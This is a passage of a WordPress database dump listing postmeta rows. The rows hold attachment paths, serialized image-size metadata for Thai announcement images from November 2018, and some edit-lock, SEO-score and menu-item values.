width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10044, 4578, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-21.png'),
(10045, 4578, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-21.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-21-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-21-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-21-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-21-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-21-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10046, 4579, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-22.png'),
(10047, 4579, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-22.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-22-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-22-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-22-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-22-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-22-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10048, 4580, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-23.png'),
(10049, 4580, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-23.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-23-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-23-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-23-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-23-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-23-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10050, 4581, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-24.png'),
(10051, 4581, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-24.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-24-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-24-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-24-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-24-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-24-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10052, 4582, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-25.png'),
(10053, 4582, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-25.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-25-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-25-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-25-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-25-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-25-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10054, 4583, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-26.png'),
(10055, 4583, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-26.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-26-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-26-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-26-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-26-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-26-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10056, 4584, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-27.png'),
(10057, 4584, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:877;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-27.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-27-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-27-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-27-768x1087.png\";s:5:\"width\";i:768;s:6:\"height\";i:1087;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-27-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-27-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10058, 4585, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-28.png'),
(10059, 4585, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-28.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-28-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-28-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-28-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-28-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-28-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10060, 4586, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-29.png'),
(10061, 4586, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-29.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-29-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-29-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-29-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-29-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-29-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10062, 4587, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-30.png'),
(10063, 4587, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-30.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-30-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-30-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-30-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-30-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-30-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10064, 4589, '_wp_attached_file', '2018/11/ประกาศ-อวท-2561-31.png'),
(10065, 4589, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:878;s:6:\"height\";i:1241;s:4:\"file\";s:48:\"2018/11/ประกาศ-อวท-2561-31.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-31-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-31-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ประกาศ-อวท-2561-31-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"ประกาศ-อวท-2561-31-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10066, 4591, '_edit_lock', '1542338070:3'),
(10067, 4591, '_edit_last', '3'),
(10068, 4591, '_hide_featured', NULL),
(10069, 4591, '_yoast_wpseo_content_score', '90'),
(10070, 4596, '_edit_lock', '1542339349:3'),
(10071, 4596, '_edit_last', '3'),
(10072, 4596, '_hide_featured', NULL),
(10073, 4596, '_yoast_wpseo_content_score', '90'),
(10074, 4600, '_menu_item_type', 'custom'),
(10075, 4600, '_menu_item_menu_item_parent', '810'),
(10076, 4600, '_menu_item_object_id', '4600'),
(10077, 4600, '_menu_item_object', 'custom'),
(10078, 4600, '_menu_item_target', ''),
(10079, 4600, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(10080, 4600, '_menu_item_xfn', ''),
(10081, 4600, '_menu_item_url', '#'),
(10083, 4601, '_wp_attached_file', '2018/11/18-9-2561-9-43-33.jpg'),
(10084, 4601, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/11/18-9-2561-9-43-33.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"18-9-2561-9-43-33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10085, 1512, '_yoast_wpseo_content_score', '30'),
(10086, 4604, '_wp_attached_file', '2018/11/16-11-2561-14-27-42.jpg'),
(10087, 4604, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:656;s:6:\"height\";i:339;s:4:\"file\";s:31:\"2018/11/16-11-2561-14-27-42.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"16-11-2561-14-27-42-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"16-11-2561-14-27-42-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"16-11-2561-14-27-42-400x207.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10088, 1516, '_yoast_wpseo_content_score', '90'),
(10089, 4607, '_wp_attached_file', '2018/11/3151420245.jpg'),
(10090, 4607, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:430;s:6:\"height\";i:319;s:4:\"file\";s:22:\"2018/11/3151420245.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"3151420245-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"3151420245-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"3151420245-400x297.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10091, 1536, '_yoast_wpseo_content_score', '30'),
(10092, 4609, '_wp_attached_file', '2018/11/16-11-2561-14-52-31.jpg'),
(10093, 4609, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:191;s:6:\"height\";i:237;s:4:\"file\";s:31:\"2018/11/16-11-2561-14-52-31.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"16-11-2561-14-52-31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10094, 4611, '_wp_attached_file', '2018/11/16-11-2561-15-10-30.jpg'),
(10095, 4611, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:162;s:6:\"height\";i:204;s:4:\"file\";s:31:\"2018/11/16-11-2561-15-10-30.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"16-11-2561-15-10-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10096, 4612, '_wp_attached_file', '2018/11/Picture1.png'),
(10097, 4612, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:907;s:6:\"height\";i:242;s:4:\"file\";s:20:\"2018/11/Picture1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Picture1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Picture1-300x80.png\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Picture1-768x205.png\";s:5:\"width\";i:768;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"Picture1-400x107.png\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10100, 1545, '_yoast_wpseo_content_score', '90'),
(10103, 4617, '_wp_attached_file', '2018/11/16-11-2561-15-30-44.jpg'),
